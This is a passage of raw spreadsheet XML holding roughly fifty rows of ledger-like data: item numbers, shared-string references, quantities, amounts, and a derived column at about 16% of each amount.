      </c>
      <c r="D1277" s="238" t="s">
        <v>8143</v>
      </c>
      <c r="E1277" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F1277" s="238" t="s">
        <v>8144</v>
      </c>
      <c r="G1277" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1277" s="10">
        <v>22</v>
      </c>
      <c r="I1277" s="14">
        <v>1189.36</v>
      </c>
      <c r="J1277" s="15">
        <v>190.2912</v>
      </c>
      <c r="K1277" s="16"/>
    </row>
    <row r="1278" spans="2:11">
      <c r="B1278" s="9">
        <v>1312</v>
      </c>
      <c r="C1278" s="238" t="s">
        <v>8145</v>
      </c>
      <c r="D1278" s="238" t="s">
        <v>8146</v>
      </c>
      <c r="E1278" s="238" t="s">
        <v>8147</v>
      </c>
      <c r="F1278" s="238" t="s">
        <v>8148</v>
      </c>
      <c r="G1278" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1278" s="10">
        <v>1</v>
      </c>
      <c r="I1278" s="14">
        <v>81.2</v>
      </c>
      <c r="J1278" s="15">
        <v>12.992</v>
      </c>
      <c r="K1278" s="16"/>
    </row>
    <row r="1279" spans="2:11">
      <c r="B1279" s="9">
        <v>1313</v>
      </c>
      <c r="C1279" s="238" t="s">
        <v>8149</v>
      </c>
      <c r="D1279" s="238" t="s">
        <v>8150</v>
      </c>
      <c r="E1279" s="238" t="s">
        <v>8151</v>
      </c>
      <c r="F1279" s="238" t="s">
        <v>8152</v>
      </c>
      <c r="G1279" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1279" s="10">
        <v>1</v>
      </c>
      <c r="I1279" s="14">
        <v>13230.76</v>
      </c>
      <c r="J1279" s="15">
        <v>2116.9216</v>
      </c>
      <c r="K1279" s="16"/>
    </row>
    <row r="1280" spans="2:11">
      <c r="B1280" s="9">
        <v>1314</v>
      </c>
      <c r="C1280" s="238" t="s">
        <v>8153</v>
      </c>
      <c r="D1280" s="238" t="s">
        <v>8154</v>
      </c>
      <c r="E1280" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F1280" s="238" t="s">
        <v>8155</v>
      </c>
      <c r="G1280" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1280" s="10">
        <v>32</v>
      </c>
      <c r="I1280" s="14">
        <v>738.32</v>
      </c>
      <c r="J1280" s="15">
        <v>118.1184</v>
      </c>
      <c r="K1280" s="16"/>
    </row>
    <row r="1281" spans="2:11">
      <c r="B1281" s="9">
        <v>1315</v>
      </c>
      <c r="C1281" s="238" t="s">
        <v>8156</v>
      </c>
      <c r="D1281" s="238" t="s">
        <v>8157</v>
      </c>
      <c r="E1281" s="238" t="s">
        <v>8158</v>
      </c>
      <c r="F1281" s="238" t="s">
        <v>8159</v>
      </c>
      <c r="G1281" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1281" s="10">
        <v>16</v>
      </c>
      <c r="I1281" s="14">
        <v>5247.15</v>
      </c>
      <c r="J1281" s="15">
        <v>839.552</v>
      </c>
      <c r="K1281" s="16"/>
    </row>
    <row r="1282" spans="2:11">
      <c r="B1282" s="9">
        <v>1316</v>
      </c>
      <c r="C1282" s="238" t="s">
        <v>8160</v>
      </c>
      <c r="D1282" s="238" t="s">
        <v>8161</v>
      </c>
      <c r="E1282" s="238" t="s">
        <v>8162</v>
      </c>
      <c r="F1282" s="238" t="s">
        <v>8163</v>
      </c>
      <c r="G1282" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1282" s="10">
        <v>57</v>
      </c>
      <c r="I1282" s="14">
        <v>2906.47</v>
      </c>
      <c r="J1282" s="15">
        <v>465.0288</v>
      </c>
      <c r="K1282" s="16"/>
    </row>
    <row r="1283" spans="2:11">
      <c r="B1283" s="9">
        <v>1317</v>
      </c>
      <c r="C1283" s="238" t="s">
        <v>8164</v>
      </c>
      <c r="D1283" s="238" t="s">
        <v>8165</v>
      </c>
      <c r="E1283" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F1283" s="238" t="s">
        <v>8166</v>
      </c>
      <c r="G1283" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1283" s="10">
        <v>2</v>
      </c>
      <c r="I1283" s="14">
        <v>2666.66</v>
      </c>
      <c r="J1283" s="15">
        <v>426.6656</v>
      </c>
      <c r="K1283" s="16"/>
    </row>
    <row r="1284" spans="2:11">
      <c r="B1284" s="9">
        <v>1318</v>
      </c>
      <c r="C1284" s="238" t="s">
        <v>8167</v>
      </c>
      <c r="D1284" s="238" t="s">
        <v>8168</v>
      </c>
      <c r="E1284" s="238" t="s">
        <v>8169</v>
      </c>
      <c r="F1284" s="238" t="s">
        <v>8170</v>
      </c>
      <c r="G1284" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1284" s="10">
        <v>1</v>
      </c>
      <c r="I1284" s="14">
        <v>598.29</v>
      </c>
      <c r="J1284" s="15">
        <v>95.7264</v>
      </c>
      <c r="K1284" s="16"/>
    </row>
    <row r="1285" spans="2:11">
      <c r="B1285" s="9">
        <v>1319</v>
      </c>
      <c r="C1285" s="238" t="s">
        <v>8171</v>
      </c>
      <c r="D1285" s="238" t="s">
        <v>8172</v>
      </c>
      <c r="E1285" s="238" t="s">
        <v>8173</v>
      </c>
      <c r="F1285" s="238" t="s">
        <v>8174</v>
      </c>
      <c r="G1285" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1285" s="10">
        <v>2</v>
      </c>
      <c r="I1285" s="14">
        <v>5897.43</v>
      </c>
      <c r="J1285" s="15">
        <v>943.5904</v>
      </c>
      <c r="K1285" s="16"/>
    </row>
    <row r="1286" spans="2:11">
      <c r="B1286" s="9">
        <v>1320</v>
      </c>
      <c r="C1286" s="238" t="s">
        <v>8175</v>
      </c>
      <c r="D1286" s="238" t="s">
        <v>8176</v>
      </c>
      <c r="E1286" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F1286" s="238" t="s">
        <v>8177</v>
      </c>
      <c r="G1286" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1286" s="9"/>
      <c r="I1286" s="17"/>
      <c r="J1286" s="15">
        <v>0</v>
      </c>
      <c r="K1286" s="16"/>
    </row>
    <row r="1287" spans="2:11">
      <c r="B1287" s="9">
        <v>1321</v>
      </c>
      <c r="C1287" s="238" t="s">
        <v>8178</v>
      </c>
      <c r="D1287" s="238" t="s">
        <v>8179</v>
      </c>
      <c r="E1287" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F1287" s="238" t="s">
        <v>8180</v>
      </c>
      <c r="G1287" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1287" s="10">
        <v>5</v>
      </c>
      <c r="I1287" s="14">
        <v>1230.09</v>
      </c>
      <c r="J1287" s="15">
        <v>196.816</v>
      </c>
      <c r="K1287" s="16"/>
    </row>
    <row r="1288" spans="2:11">
      <c r="B1288" s="9">
        <v>1322</v>
      </c>
      <c r="C1288" s="238" t="s">
        <v>8181</v>
      </c>
      <c r="D1288" s="238" t="s">
        <v>8182</v>
      </c>
      <c r="E1288" s="238" t="s">
        <v>5318</v>
      </c>
      <c r="F1288" s="238" t="s">
        <v>8183</v>
      </c>
      <c r="G1288" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1288" s="10">
        <v>2</v>
      </c>
      <c r="I1288" s="14">
        <v>49.15</v>
      </c>
      <c r="J1288" s="15">
        <v>19.664</v>
      </c>
      <c r="K1288" s="16"/>
    </row>
    <row r="1289" spans="2:11">
      <c r="B1289" s="9">
        <v>1323</v>
      </c>
      <c r="C1289" s="238" t="s">
        <v>8184</v>
      </c>
      <c r="D1289" s="238" t="s">
        <v>8185</v>
      </c>
      <c r="E1289" s="238" t="s">
        <v>8186</v>
      </c>
      <c r="F1289" s="238" t="s">
        <v>8187</v>
      </c>
      <c r="G1289" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1289" s="10">
        <v>9</v>
      </c>
      <c r="I1289" s="14">
        <v>2461.53</v>
      </c>
      <c r="J1289" s="15">
        <v>393.84</v>
      </c>
      <c r="K1289" s="16"/>
    </row>
    <row r="1290" spans="2:11">
      <c r="B1290" s="9">
        <v>1324</v>
      </c>
      <c r="C1290" s="238" t="s">
        <v>8188</v>
      </c>
      <c r="D1290" s="238" t="s">
        <v>8189</v>
      </c>
      <c r="E1290" s="238" t="s">
        <v>8190</v>
      </c>
      <c r="F1290" s="238" t="s">
        <v>8191</v>
      </c>
      <c r="G1290" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1290" s="10">
        <v>2</v>
      </c>
      <c r="I1290" s="14">
        <v>136.75</v>
      </c>
      <c r="J1290" s="15">
        <v>21.8816</v>
      </c>
      <c r="K1290" s="16"/>
    </row>
    <row r="1291" spans="2:11">
      <c r="B1291" s="9">
        <v>1325</v>
      </c>
      <c r="C1291" s="238" t="s">
        <v>8192</v>
      </c>
      <c r="D1291" s="238" t="s">
        <v>8193</v>
      </c>
      <c r="E1291" s="238" t="s">
        <v>8194</v>
      </c>
      <c r="F1291" s="238" t="s">
        <v>8195</v>
      </c>
      <c r="G1291" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1291" s="10">
        <v>2</v>
      </c>
      <c r="I1291" s="14">
        <v>282.06</v>
      </c>
      <c r="J1291" s="15">
        <v>45.1296</v>
      </c>
      <c r="K1291" s="16"/>
    </row>
    <row r="1292" spans="2:11">
      <c r="B1292" s="9">
        <v>1326</v>
      </c>
      <c r="C1292" s="238" t="s">
        <v>8196</v>
      </c>
      <c r="D1292" s="238" t="s">
        <v>8197</v>
      </c>
      <c r="E1292" s="238" t="s">
        <v>8198</v>
      </c>
      <c r="F1292" s="238" t="s">
        <v>8199</v>
      </c>
      <c r="G1292" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1292" s="10">
        <v>2</v>
      </c>
      <c r="I1292" s="14">
        <v>282.06</v>
      </c>
      <c r="J1292" s="15">
        <v>45.1296</v>
      </c>
      <c r="K1292" s="16"/>
    </row>
    <row r="1293" spans="2:11">
      <c r="B1293" s="9">
        <v>1327</v>
      </c>
      <c r="C1293" s="238" t="s">
        <v>8200</v>
      </c>
      <c r="D1293" s="238" t="s">
        <v>8201</v>
      </c>
      <c r="E1293" s="238" t="s">
        <v>8202</v>
      </c>
      <c r="F1293" s="238" t="s">
        <v>8203</v>
      </c>
      <c r="G1293" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1293" s="10">
        <v>1</v>
      </c>
      <c r="I1293" s="14">
        <v>243.59</v>
      </c>
      <c r="J1293" s="15">
        <v>38.9744</v>
      </c>
      <c r="K1293" s="16"/>
    </row>
    <row r="1294" spans="2:11">
      <c r="B1294" s="9">
        <v>1328</v>
      </c>
      <c r="C1294" s="238" t="s">
        <v>8204</v>
      </c>
      <c r="D1294" s="238" t="s">
        <v>8205</v>
      </c>
      <c r="E1294" s="238" t="s">
        <v>8162</v>
      </c>
      <c r="F1294" s="238" t="s">
        <v>8206</v>
      </c>
      <c r="G1294" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1294" s="10">
        <v>2</v>
      </c>
      <c r="I1294" s="14">
        <v>140</v>
      </c>
      <c r="J1294" s="15">
        <v>22.4</v>
      </c>
      <c r="K1294" s="16"/>
    </row>
    <row r="1295" spans="2:11">
      <c r="B1295" s="9">
        <v>1329</v>
      </c>
      <c r="C1295" s="238" t="s">
        <v>8207</v>
      </c>
      <c r="D1295" s="238" t="s">
        <v>8208</v>
      </c>
      <c r="E1295" s="238" t="s">
        <v>7316</v>
      </c>
      <c r="F1295" s="238" t="s">
        <v>8209</v>
      </c>
      <c r="G1295" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1295" s="10">
        <v>1</v>
      </c>
      <c r="I1295" s="14">
        <v>1692.3</v>
      </c>
      <c r="J1295" s="15">
        <v>270.768</v>
      </c>
      <c r="K1295" s="16"/>
    </row>
    <row r="1296" spans="2:11">
      <c r="B1296" s="9">
        <v>1330</v>
      </c>
      <c r="C1296" s="238" t="s">
        <v>8210</v>
      </c>
      <c r="D1296" s="238" t="s">
        <v>8211</v>
      </c>
      <c r="E1296" s="238" t="s">
        <v>8212</v>
      </c>
      <c r="F1296" s="238" t="s">
        <v>8213</v>
      </c>
      <c r="G1296" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1296" s="10">
        <v>1</v>
      </c>
      <c r="I1296" s="14">
        <v>324.79</v>
      </c>
      <c r="J1296" s="15">
        <v>51.9664</v>
      </c>
      <c r="K1296" s="16"/>
    </row>
    <row r="1297" spans="2:11">
      <c r="B1297" s="9">
        <v>1331</v>
      </c>
      <c r="C1297" s="238" t="s">
        <v>8214</v>
      </c>
      <c r="D1297" s="238" t="s">
        <v>6712</v>
      </c>
      <c r="E1297" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F1297" s="9"/>
      <c r="G1297" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1297" s="10">
        <v>6815</v>
      </c>
      <c r="I1297" s="14">
        <v>17594.18</v>
      </c>
      <c r="J1297" s="15">
        <v>2813.232</v>
      </c>
      <c r="K1297" s="16"/>
    </row>
    <row r="1298" spans="2:11">
      <c r="B1298" s="9">
        <v>1332</v>
      </c>
      <c r="C1298" s="238" t="s">
        <v>8215</v>
      </c>
      <c r="D1298" s="238" t="s">
        <v>8216</v>
      </c>
      <c r="E1298" s="238" t="s">
        <v>8217</v>
      </c>
      <c r="F1298" s="9"/>
      <c r="G1298" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1298" s="10">
        <v>679</v>
      </c>
      <c r="I1298" s="14">
        <v>52794.63</v>
      </c>
      <c r="J1298" s="15">
        <v>8446.76</v>
      </c>
      <c r="K1298" s="16"/>
    </row>
    <row r="1299" spans="2:11">
      <c r="B1299" s="9">
        <v>1333</v>
      </c>
      <c r="C1299" s="238" t="s">
        <v>8218</v>
      </c>
      <c r="D1299" s="238" t="s">
        <v>8219</v>
      </c>
      <c r="E1299" s="238" t="s">
        <v>8220</v>
      </c>
      <c r="F1299" s="9"/>
      <c r="G1299" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1299" s="10">
        <v>60</v>
      </c>
      <c r="I1299" s="14">
        <v>770.29</v>
      </c>
      <c r="J1299" s="15">
        <v>123.264</v>
      </c>
      <c r="K1299" s="16"/>
    </row>
    <row r="1300" spans="2:11">
      <c r="B1300" s="9">
        <v>1334</v>
      </c>
      <c r="C1300" s="238" t="s">
        <v>8221</v>
      </c>
      <c r="D1300" s="238" t="s">
        <v>8222</v>
      </c>
      <c r="E1300" s="238" t="s">
        <v>8223</v>
      </c>
      <c r="F1300" s="238" t="s">
        <v>8224</v>
      </c>
      <c r="G1300" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1300" s="10">
        <v>1</v>
      </c>
      <c r="I1300" s="14">
        <v>3931.62</v>
      </c>
      <c r="J1300" s="15">
        <v>629.0592</v>
      </c>
      <c r="K1300" s="16"/>
    </row>
    <row r="1301" spans="2:11">
      <c r="B1301" s="9">
        <v>1335</v>
      </c>
      <c r="C1301" s="238" t="s">
        <v>8225</v>
      </c>
      <c r="D1301" s="238" t="s">
        <v>8226</v>
      </c>
      <c r="E1301" s="238" t="s">
        <v>8227</v>
      </c>
      <c r="F1301" s="238" t="s">
        <v>8228</v>
      </c>
      <c r="G1301" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1301" s="10">
        <v>75</v>
      </c>
      <c r="I1301" s="14">
        <v>437.56</v>
      </c>
      <c r="J1301" s="15">
        <v>69.96</v>
      </c>
      <c r="K1301" s="16"/>
    </row>
    <row r="1302" spans="2:11">
      <c r="B1302" s="9">
        <v>1336</v>
      </c>
      <c r="C1302" s="238" t="s">
        <v>8229</v>
      </c>
      <c r="D1302" s="238" t="s">
        <v>8230</v>
      </c>
      <c r="E1302" s="238" t="s">
        <v>8231</v>
      </c>
      <c r="F1302" s="238" t="s">
        <v>8232</v>
      </c>
      <c r="G1302" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1302" s="10">
        <v>2</v>
      </c>
      <c r="I1302" s="14">
        <v>658.12</v>
      </c>
      <c r="J1302" s="15">
        <v>105.2992</v>
      </c>
      <c r="K1302" s="16"/>
    </row>
    <row r="1303" spans="2:11">
      <c r="B1303" s="9">
        <v>1337</v>
      </c>
      <c r="C1303" s="238" t="s">
        <v>8233</v>
      </c>
      <c r="D1303" s="238" t="s">
        <v>8234</v>
      </c>
      <c r="E1303" s="238" t="s">
        <v>8235</v>
      </c>
      <c r="F1303" s="238" t="s">
        <v>8236</v>
      </c>
      <c r="G1303" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1303" s="10">
        <v>55</v>
      </c>
      <c r="I1303" s="14">
        <v>234.03</v>
      </c>
      <c r="J1303" s="15">
        <v>37.488</v>
      </c>
      <c r="K1303" s="16"/>
    </row>
    <row r="1304" spans="2:11">
      <c r="B1304" s="9">
        <v>1338</v>
      </c>
      <c r="C1304" s="238" t="s">
        <v>8237</v>
      </c>
      <c r="D1304" s="238" t="s">
        <v>8238</v>
      </c>
      <c r="E1304" s="238" t="s">
        <v>8239</v>
      </c>
      <c r="F1304" s="238" t="s">
        <v>8240</v>
      </c>
      <c r="G1304" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1304" s="10">
        <v>2</v>
      </c>
      <c r="I1304" s="14">
        <v>3076.92</v>
      </c>
      <c r="J1304" s="15">
        <v>492.3072</v>
      </c>
      <c r="K1304" s="16"/>
    </row>
    <row r="1305" spans="2:11">
      <c r="B1305" s="9">
        <v>1339</v>
      </c>
      <c r="C1305" s="238" t="s">
        <v>8241</v>
      </c>
      <c r="D1305" s="238" t="s">
        <v>8242</v>
      </c>
      <c r="E1305" s="238" t="s">
        <v>8243</v>
      </c>
      <c r="F1305" s="238" t="s">
        <v>8244</v>
      </c>
      <c r="G1305" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1305" s="10">
        <v>5</v>
      </c>
      <c r="I1305" s="14">
        <v>7692.3</v>
      </c>
      <c r="J1305" s="15">
        <v>1230.768</v>
      </c>
      <c r="K1305" s="16"/>
    </row>
    <row r="1306" spans="2:11">
      <c r="B1306" s="9">
        <v>1340</v>
      </c>
      <c r="C1306" s="238" t="s">
        <v>8245</v>
      </c>
      <c r="D1306" s="238" t="s">
        <v>8246</v>
      </c>
      <c r="E1306" s="238" t="s">
        <v>8247</v>
      </c>
      <c r="F1306" s="238" t="s">
        <v>8248</v>
      </c>
      <c r="G1306" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1306" s="10">
        <v>1</v>
      </c>
      <c r="I1306" s="14">
        <v>1538.46</v>
      </c>
      <c r="J1306" s="15">
        <v>246.1536</v>
      </c>
      <c r="K1306" s="16"/>
    </row>
    <row r="1307" spans="2:11">
      <c r="B1307" s="9">
        <v>1341</v>
      </c>
      <c r="C1307" s="238" t="s">
        <v>8249</v>
      </c>
      <c r="D1307" s="238" t="s">
        <v>8250</v>
      </c>
      <c r="E1307" s="238" t="s">
        <v>8251</v>
      </c>
      <c r="F1307" s="238" t="s">
        <v>8252</v>
      </c>
      <c r="G1307" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1307" s="10">
        <v>6</v>
      </c>
      <c r="I1307" s="14">
        <v>5452.99</v>
      </c>
      <c r="J1307" s="15">
        <v>872.4768</v>
      </c>
      <c r="K1307" s="16"/>
    </row>
    <row r="1308" spans="2:11">
      <c r="B1308" s="9">
        <v>1342</v>
      </c>
      <c r="C1308" s="238" t="s">
        <v>8253</v>
      </c>
      <c r="D1308" s="238" t="s">
        <v>8254</v>
      </c>
      <c r="E1308" s="238" t="s">
        <v>3856</v>
      </c>
      <c r="F1308" s="238" t="s">
        <v>8255</v>
      </c>
      <c r="G1308" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1308" s="10">
        <v>1</v>
      </c>
      <c r="I1308" s="14">
        <v>7008.55</v>
      </c>
      <c r="J1308" s="15">
        <v>1121.368</v>
      </c>
      <c r="K1308" s="16"/>
    </row>
    <row r="1309" spans="2:11">
      <c r="B1309" s="9">
        <v>1343</v>
      </c>
      <c r="C1309" s="238" t="s">
        <v>8256</v>
      </c>
      <c r="D1309" s="238" t="s">
        <v>8257</v>
      </c>
      <c r="E1309" s="238" t="s">
        <v>8258</v>
      </c>
      <c r="F1309" s="238" t="s">
        <v>8259</v>
      </c>
      <c r="G1309" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1309" s="10">
        <v>1</v>
      </c>
      <c r="I1309" s="14">
        <v>5820.51</v>
      </c>
      <c r="J1309" s="15">
        <v>931.2816</v>
      </c>
      <c r="K1309" s="16"/>
    </row>
    <row r="1310" spans="2:11">
      <c r="B1310" s="9">
        <v>1344</v>
      </c>
      <c r="C1310" s="238" t="s">
        <v>8260</v>
      </c>
      <c r="D1310" s="238" t="s">
        <v>8261</v>
      </c>
      <c r="E1310" s="238" t="s">
        <v>8262</v>
      </c>
      <c r="F1310" s="238" t="s">
        <v>8263</v>
      </c>
      <c r="G1310" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1310" s="10">
        <v>1</v>
      </c>
      <c r="I1310" s="14">
        <v>4871.79</v>
      </c>
      <c r="J1310" s="15">
        <v>779.4864</v>
      </c>
      <c r="K1310" s="16"/>
    </row>
    <row r="1311" spans="2:11">
      <c r="B1311" s="9">
        <v>1345</v>
      </c>
      <c r="C1311" s="238" t="s">
        <v>8264</v>
      </c>
      <c r="D1311" s="238" t="s">
        <v>8265</v>
      </c>
      <c r="E1311" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F1311" s="238" t="s">
        <v>8266</v>
      </c>
      <c r="G1311" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1311" s="10">
        <v>30</v>
      </c>
      <c r="I1311" s="14">
        <v>9136.23</v>
      </c>
      <c r="J1311" s="15">
        <v>1461.792</v>
      </c>
      <c r="K1311" s="16"/>
    </row>
    <row r="1312" spans="2:11">
      <c r="B1312" s="9">
        <v>1346</v>
      </c>
      <c r="C1312" s="238" t="s">
        <v>8267</v>
      </c>
      <c r="D1312" s="238" t="s">
        <v>8268</v>
      </c>
      <c r="E1312" s="238" t="s">
        <v>7825</v>
      </c>
      <c r="F1312" s="238" t="s">
        <v>8269</v>
      </c>
      <c r="G1312" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1312" s="10">
        <v>2</v>
      </c>
      <c r="I1312" s="14">
        <v>307.68</v>
      </c>
      <c r="J1312" s="15">
        <v>49.2288</v>
      </c>
      <c r="K1312" s="16"/>
    </row>
    <row r="1313" spans="2:11">
      <c r="B1313" s="9">
        <v>1347</v>
      </c>
      <c r="C1313" s="238" t="s">
        <v>8270</v>
      </c>
      <c r="D1313" s="238" t="s">
        <v>8271</v>
      </c>
      <c r="E1313" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F1313" s="238" t="s">
        <v>8272</v>
      </c>
      <c r="G1313" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1313" s="10">
        <v>53</v>
      </c>
      <c r="I1313" s="14">
        <v>342.95</v>
      </c>
      <c r="J1313" s="15">
        <v>54.8656</v>
      </c>
      <c r="K1313" s="16"/>
    </row>
    <row r="1314" spans="2:11">
      <c r="B1314" s="9">
        <v>1348</v>
      </c>
      <c r="C1314" s="238" t="s">
        <v>8273</v>
      </c>
      <c r="D1314" s="238" t="s">
        <v>8274</v>
      </c>
      <c r="E1314" s="238" t="s">
        <v>8275</v>
      </c>
      <c r="F1314" s="238" t="s">
        <v>8276</v>
      </c>
      <c r="G1314" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1314" s="10">
        <v>3</v>
      </c>
      <c r="I1314" s="14">
        <v>920.77</v>
      </c>
      <c r="J1314" s="15">
        <v>147.3216</v>
      </c>
      <c r="K1314" s="16"/>
    </row>
    <row r="1315" spans="2:11">
      <c r="B1315" s="9">
        <v>1349</v>
      </c>
      <c r="C1315" s="238" t="s">
        <v>8277</v>
      </c>
      <c r="D1315" s="238" t="s">
        <v>8278</v>
      </c>
      <c r="E1315" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F1315" s="238" t="s">
        <v>8279</v>
      </c>
      <c r="G1315" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1315" s="10">
        <v>10</v>
      </c>
      <c r="I1315" s="14">
        <v>2222.22</v>
      </c>
      <c r="J1315" s="15">
        <v>355.552</v>
      </c>
      <c r="K1315" s="16"/>
    </row>
    <row r="1316" spans="2:11">
      <c r="B1316" s="9">
        <v>1350</v>
      </c>
      <c r="C1316" s="238" t="s">
        <v>8280</v>
      </c>
      <c r="D1316" s="238" t="s">
        <v>8281</v>
      </c>
      <c r="E1316" s="238" t="s">
        <v>6810</v>
      </c>
      <c r="F1316" s="238" t="s">
        <v>8282</v>
      </c>
      <c r="G1316" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1316" s="10">
        <v>3</v>
      </c>
      <c r="I1316" s="14">
        <v>464.09</v>
      </c>
      <c r="J1316" s="15">
        <v>74.256</v>
      </c>
      <c r="K1316" s="16"/>
    </row>
    <row r="1317" spans="2:11">
      <c r="B1317" s="9">
        <v>1351</v>
      </c>
      <c r="C1317" s="238" t="s">
        <v>8283</v>
      </c>
      <c r="D1317" s="238" t="s">
        <v>8284</v>
      </c>
      <c r="E1317" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F1317" s="238" t="s">
        <v>8285</v>
      </c>
      <c r="G1317" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1317" s="10">
        <v>14</v>
      </c>
      <c r="I1317" s="14">
        <v>208.54</v>
      </c>
      <c r="J1317" s="15">
        <v>33.376</v>
      </c>
      <c r="K1317" s="16"/>
    </row>
    <row r="1318" spans="2:11">
      <c r="B1318" s="9">
        <v>1352</v>
      </c>
      <c r="C1318" s="238" t="s">
        <v>8286</v>
      </c>
      <c r="D1318" s="238" t="s">
        <v>8287</v>
      </c>
      <c r="E1318" s="238" t="s">
        <v>4817</v>
      </c>
      <c r="F1318" s="238" t="s">
        <v>8288</v>
      </c>
      <c r="G1318" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1318" s="10">
        <v>1</v>
      </c>
      <c r="I1318" s="14">
        <v>51.28</v>
      </c>
      <c r="J1318" s="15">
        <v>8.2048</v>
      </c>
      <c r="K1318" s="16"/>
    </row>
    <row r="1319" spans="2:11">
      <c r="B1319" s="9">
        <v>1353</v>
      </c>
      <c r="C1319" s="238" t="s">
        <v>8289</v>
      </c>
      <c r="D1319" s="238" t="s">
        <v>8290</v>
      </c>
      <c r="E1319" s="238" t="s">
        <v>7796</v>
      </c>
      <c r="F1319" s="238" t="s">
        <v>8291</v>
      </c>
      <c r="G1319" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1319" s="10">
        <v>8</v>
      </c>
      <c r="I1319" s="14">
        <v>6153.83</v>
      </c>
      <c r="J1319" s="15">
        <v>984.6144</v>
      </c>
      <c r="K1319" s="16"/>
    </row>
    <row r="1320" spans="2:11">
      <c r="B1320" s="9">
        <v>1354</v>
      </c>
      <c r="C1320" s="238" t="s">
        <v>8292</v>
      </c>
      <c r="D1320" s="238" t="s">
        <v>8293</v>
      </c>
      <c r="E1320" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F1320" s="238" t="s">
        <v>8294</v>
      </c>
      <c r="G1320" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1320" s="10">
        <v>26</v>
      </c>
      <c r="I1320" s="14">
        <v>2637.06</v>
      </c>
      <c r="J1320" s="15">
        <v>421.9488</v>
      </c>
      <c r="K1320" s="16"/>
    </row>
    <row r="1321" spans="2:11">
      <c r="B1321" s="9">
        <v>1355</v>
      </c>
      <c r="C1321" s="238" t="s">
        <v>8295</v>
      </c>
      <c r="D1321" s="238" t="s">
        <v>8296</v>
      </c>
      <c r="E1321" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F1321" s="238" t="s">
        <v>8297</v>
      </c>
      <c r="G1321" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1321" s="10">
        <v>4</v>
      </c>
      <c r="I1321" s="14">
        <v>615.38</v>
      </c>
      <c r="J1321" s="15">
        <v>246.16</v>
      </c>
      <c r="K1321" s="16"/>
    </row>
    <row r="1322" spans="2:11">
      <c r="B1322" s="9">
        <v>1356</v>
      </c>
      <c r="C1322" s="238" t="s">
        <v>8298</v>
      </c>
      <c r="D1322" s="238" t="s">
        <v>8299</v>
      </c>
      <c r="E1322" s="238" t="s">
        <v>8300</v>
      </c>
      <c r="F1322" s="238" t="s">
        <v>8301</v>
      </c>
      <c r="G1322" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1322" s="10">
        <v>4</v>
      </c>
      <c r="I1322" s="14">
        <v>2923.08</v>
      </c>
      <c r="J1322" s="15">
        <v>1169.232</v>
      </c>
      <c r="K1322" s="16"/>
    </row>
    <row r="1323" spans="2:11">
      <c r="B1323" s="9">
        <v>1357</v>
      </c>
      <c r="C1323" s="238" t="s">
        <v>8302</v>
      </c>
      <c r="D1323" s="238" t="s">
        <v>8303</v>
      </c>
      <c r="E1323" s="238" t="s">
        <v>7771</v>
      </c>
      <c r="F1323" s="238" t="s">
        <v>8304</v>
      </c>
      <c r="G1323" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1323" s="10">
        <v>4</v>
      </c>
      <c r="I1323" s="14">
        <v>1162.39</v>
      </c>
      <c r="J1323" s="15">
        <v>464.96</v>
      </c>
      <c r="K1323" s="16"/>
    </row>
    <row r="1324" spans="2:11">
      <c r="B1324" s="9">
        <v>1358</v>
      </c>
      <c r="C1324" s="238" t="s">
        <v>8305</v>
      </c>
      <c r="D1324" s="238" t="s">
        <v>8306</v>
      </c>
      <c r="E1324" s="238" t="s">
        <v>6586</v>
